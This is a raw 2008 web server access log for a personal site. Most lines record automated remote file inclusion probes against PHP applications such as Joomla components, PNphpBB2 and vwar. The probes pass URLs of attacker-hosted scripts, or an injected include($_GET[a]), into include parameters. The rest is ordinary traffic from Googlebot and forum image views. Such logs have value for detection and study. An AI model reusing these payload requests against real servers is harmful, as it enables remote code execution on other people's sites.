65.38.105.133 - - [05/May/2008:11:10:06 -0700] "GET /logs/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:10:07 -0700] "GET /logs/index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.249.70.117 - - [05/May/2008:11:10:13 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/ HTTP/1.1" 200 7189 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
65.38.105.133 - - [05/May/2008:11:10:16 -0700] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.810" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:10:20 -0700] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.810" "www.dmulk.com"
80.249.117.66 - - [05/May/2008:11:10:20 -0700] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.803" "www.dmulk.com"
65.38.105.133 - - [05/May/2008:11:10:21 -0700] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.team-nds.de/extra/echo.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.810" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:11:10:38 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:11:10:38 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.128.57 - - [05/May/2008:11:10:52 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.bes.org.tr/imgcls/cmd2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:11:09 -0700] "GET /logs/access_080211.log//phplinks/http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:11:09 -0700] "GET //phplinks/http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:11:09 -0700] "GET /logs//phplinks/http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:11:20 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:11:25 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:11:26 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
200.203.13.128 - - [05/May/2008:11:11:39 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.203.13.128 - - [05/May/2008:11:11:40 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.100.241.84 - - [05/May/2008:11:11:57 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://fairplay.ilabs.at//smile.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
212.100.241.84 - - [05/May/2008:11:11:57 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://fairplay.ilabs.at//smile.gif???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.234.144.180 - - [05/May/2008:11:12:04 -0700] "GET /logs//83_advertising/config.inc.php?path_escape=http://www.wrwebb.com/backup/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.234.144.180 - - [05/May/2008:11:12:04 -0700] "GET //83_advertising/config.inc.php?path_escape=http://www.wrwebb.com/backup/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.213.78.87 - - [05/May/2008:11:12:31 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.74.114 - - [05/May/2008:11:12:31 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.74.114 - - [05/May/2008:11:12:31 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.213.78.87 - - [05/May/2008:11:12:31 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.154.168 - - [05/May/2008:11:12:35 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.154.168 - - [05/May/2008:11:12:36 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:11:12:46 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
92.240.65.137 - - [05/May/2008:11:12:51 -0700] "GET /logs//errors.php?errors=http://fairplay.ilabs.at//smile.gif???? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
92.240.65.137 - - [05/May/2008:11:12:51 -0700] "GET //errors.php?errors=http://fairplay.ilabs.at//smile.gif???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
66.249.70.117 - - [05/May/2008:11:13:06 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/ HTTP/1.1" 200 7189 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
61.63.9.163 - - [05/May/2008:11:13:06 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
61.63.9.163 - - [05/May/2008:11:13:08 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:21 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:21 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:21 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:21 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:22 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:22 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:22 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:22 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:23 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:23 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:23 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:23 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:23 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:24 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:24 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:24 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:24 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:25 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:26 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:26 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:26 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:26 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.59.82.140 - - [05/May/2008:11:13:26 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
61.63.9.163 - - [05/May/2008:11:13:31 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:13:45 -0700] "GET /logs/access_080206.log/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:13:45 -0700] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:13:46 -0700] "GET /logs/components/com_hashcash/server.php?mosConfig_absolute_path=http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:13:56 -0700] "GET /logs/access.log/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:14:03 -0700] "GET /logs/index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.85.129 - - [05/May/2008:11:14:03 -0700] "GET /index.php?sayfa=http://turque.org/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:11:14:29 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:11:14:30 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:14:42 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:14:42 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:14:42 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:14:49 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:14:55 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:11:14:55 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.69" "www.dmulk.com"
206.212.241.218 - - [05/May/2008:11:14:59 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.freephotostation.com//photos/28/idd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:15:01 -0700] "GET /logs/access.log//language.inc.php?langs_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:15:02 -0700] "GET //language.inc.php?langs_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:11:15:02 -0700] "GET /logs//language.inc.php?langs_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:11:15:23 -0700] "GET /logs/access_080215.log//content.php?inc=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:11:15:23 -0700] "GET //content.php?inc=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [05/May/2008:11:15:24 -0700] "GET /logs//content.php?inc=http://mykonos.bargaingreece.com//components/com_log/sefe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:11:15:29 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.16.18 - - [05/May/2008:11:15:38 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.181.2.242 - - [05/May/2008:11:16:04 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://tuningevasions.free.fr/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.181.2.242 - - [05/May/2008:11:16:05 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://tuningevasions.free.fr/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.181.2.242 - - [05/May/2008:11:16:06 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://tuningevasions.free.fr/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.64.76.29 - - [05/May/2008:11:16:08 -0700] "GET /logs//1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [05/May/2008:11:16:08 -0700] "GET //1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.peccu.org/components/com_extcalendar/upload/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:16:11 -0700] "GET /logs/access_080211.log//phplinks/http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:16:11 -0700] "GET //phplinks/http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
202.179.0.195 - - [05/May/2008:11:16:11 -0700] "GET /logs//phplinks/http://www.pnp21.co.kr/bbs/data/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:11:16:47 -0700] "GET /logs/access_080311.log//agendax/addevent.inc.php?agendax_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:11:16:47 -0700] "GET /logs/access_080311.log//agendax/addevent.inc.php?agendax_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:11:17:03 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:11:17:22 -0700] "GET /logs/access_080311.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:11:17:22 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.18.192.91 - - [05/May/2008:11:17:23 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cdpm3.com/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.69.211 - - [05/May/2008:11:17:45 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [05/May/2008:11:18:00 -0700] "GET /logs/access_080321.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.19.139.89 - - [05/May/2008:11:18:12 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.arpel.org/ex/data.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
